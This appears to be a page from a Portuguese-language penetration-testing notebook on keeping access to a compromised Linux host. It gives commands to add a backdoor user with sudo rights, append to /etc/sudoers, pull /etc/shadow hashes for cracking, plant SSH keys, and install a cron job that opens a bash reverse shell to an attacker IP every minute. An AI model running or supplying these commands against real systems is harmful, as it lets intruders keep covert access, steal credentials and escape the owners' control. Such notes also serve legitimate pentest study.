Persistência

Criando um Novo Usuário

Apesar de não ser algo muito discreto, podemos utilizar um novo usuário para servir como um Backdoor

adduser <user>
adduser <user> sudo

Caso o alvo possua SSH instalado, execute também os comandos abaixo:

useradd <user>
passwd <user>
echo "<user>    ALL=(ALL) ALL" >> /etc/sudoers

Brute Force em Senhas do SO

Acesse /etc/shadow para resgatar os hashes das senhas, e depois tente algum Brute Force para quebrá-las

Chaves SSH

Adicione uma chave à conta SSH existente

Cronjob

Crie um script na Cronjob para realizar uma Reverse Shell a cada X minutos. Verifique na seção Linux - Utilização para ver mais detalhe em como configura uma Cronjob. Não esqueça de verificar se o serviço da Cronjob está incializada (service cron status).

Podemos por exemplo, executar os seguintes comandos para realizar uma futura reverse shell:

echo "* * * * * bash -c 'bash -i >& /dev/tcp/<ip_atacante>/<port> 0>&1'" > cron
crontab -i cron
crontab -l

PreviousC2 (Command & Control)NextShellshock

Last updated 3 years ago